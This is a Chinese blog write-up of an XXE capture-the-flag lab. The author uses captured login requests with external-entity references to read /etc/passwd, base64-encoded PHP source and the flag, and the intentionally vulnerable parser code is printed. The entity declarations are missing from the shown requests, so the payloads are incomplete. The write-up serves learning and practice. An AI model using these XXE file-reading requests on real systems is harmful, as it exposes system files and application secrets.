安鸾之XXE漏洞
前言
本文章起笔时神烦,用打下靶场转移下思绪。
注:本教程仅供学习参考,请勿用在非法途径上,违者后果自负,与笔者无关。 –涂寐
笔记
靶场信息
1 | XML外部实体注入,简称XXE |
通关记录
登录框当然先是一波弱口令,admin/admin,有提示弹窗。改下密码看效果
1
2admin 登陆成功!
admin 登陆失败!好吧,直接尝试写入xml文档,得到一堆报错信息
1
2
3
4
5
<name>&tumei;</name>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25Error: Invalid XML:
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: XML declaration allowed only at the start of the document in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Entity 'tumei' not defined in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>
<result><code>0</code><msg></msg></result>:parsererror简要分析下报错,先看下某翻译的效果;说下收获,拿到了物理路径
1
2
3
4
5
6
7
8
9
10
11
12
13错误:无效的XML:<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:仅允许在<b>/var/www/html/doLogin中的实体第1行的文档开头进行XML声明。php</b>在线<b>12</b><br/>
<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:未在<b>/var/www/html/doLogin中的实体第1行中定义实体“tumei”。php</b>在线<b>12</b><br/>
<br/>
<b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
<br/>
<b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
<result><code>0</code><msg></msg></result>:解析器错误算啦,去bp抓个包看下请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18# 以下注释仅笔者理解,欢迎提出不同意见
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
# 请求头,表示发送端(客户端)希望接受的数据类型
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
# 实体头,表示发送端(客户端|服务器)发送的实体数据的数据类型
Content-Type: application/xml;charset=utf-8
# 请求方式,XMLHttpRequest 则为 Ajax 请求(异步HTTP)
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 65
DNT: 1
Connection: close
<user><username>admin</username><password>admin</password></user>观察部分请求头(Accept)可知通过xml传参,构造请求参数,恭喜你得到新的报错
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 225
DNT: 1
Connection: close
<name>&tumei;</name>
<user><username>admin</username><password>admin</password></user>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Input is not proper UTF-8, indicate encoding !
Bytes: 0x81 0xFB 0xD6 0x84 in Entity, line: 3 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Extra content at the end of the document in Entity, line: 6 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>
<result><code>0</code><msg></msg></result>1
2
3
4
5
6
7
8
9
10<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:输入不正确,请指示编码!
字节:0x81 0xFB 0xD6 0x84在实体中,第3行在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:实体中文档末尾的额外内容,第6行,在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
<br/>
<b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
<br/>
<b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
<result><code>0</code><msg></msg></result>把参数 &tumei; 作为 username 标签的内容,突如其来呀
(应该是我太菜了)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 176
DNT: 1
Connection: close
<user><username>&tumei;</username><password>admin</password></user>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34200 OK
Date: Sun, 09 Jan 2022 03:04:32 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 1330
Connection: close
Content-Type: text/html; charset=utf-8
<result><code>0</code><msg>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
systemd-timesync:x:101:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:105:108::/var/run/dbus:/bin/false
</msg></result>换个方法,用php伪协议结合base64编码进行读取网页源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20# 改用原因: 读取源代码并进行base64编码输出,避免php源码文件直接解析输出
# 此处文件路径可写为绝对路径(之前报错提供):/var/www/html/doLogin.php
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 203
DNT: 1
Connection: close
<user><username>&tumei;</username><password>admin</password></user>1
2
3
4
5
6
7
8
9
10200 OK
Date: Sun, 09 Jan 2022 03:16:00 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 1066
Connection: close
Content-Type: text/html; charset=utf-8
<result><code>0</code><msg>PD9waHAKCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICdhZG1pbic7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+</msg></result>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29<?php
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>好吧,只能读取文件,可笔者需要一个查看目录的方法定位flag的位置
……回去审一下题,是我唐突了,赤果果地提供路劲:/flag1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 195
DNT: 1
Connection: close
<user><username>&tumei;</username><password>admin</password></user>1
2
3
4
5
6
7
8
9
10200 OK
Date: Wed, 12 Jan 2022 16:20:19 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 94
Connection: close
Content-Type: text/html; charset=utf-8
<result><code>0</code><msg>ZmxhZ3tkOTdhYTY5YjAzNGQ2YjlhZjc0MmJkM2M2M2QxNWYwOX0=</msg></result>可以直接用firl://协议,省个解码的步骤
1
flag{d97aa69b034d6b9af742bd3c63d15f09}
后记
太冷了,想着明早再瞅瞅,结果还是继续了,幸运的是拿下了。
有些憨,居然审题不清,阔以,又找到一个缺点。
- 本文标题:安鸾之XXE漏洞
- 本文作者:涂寐
- 创建时间:2022-01-13 00:35:27
- 本文链接:article/10a5a8a4.html
- 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论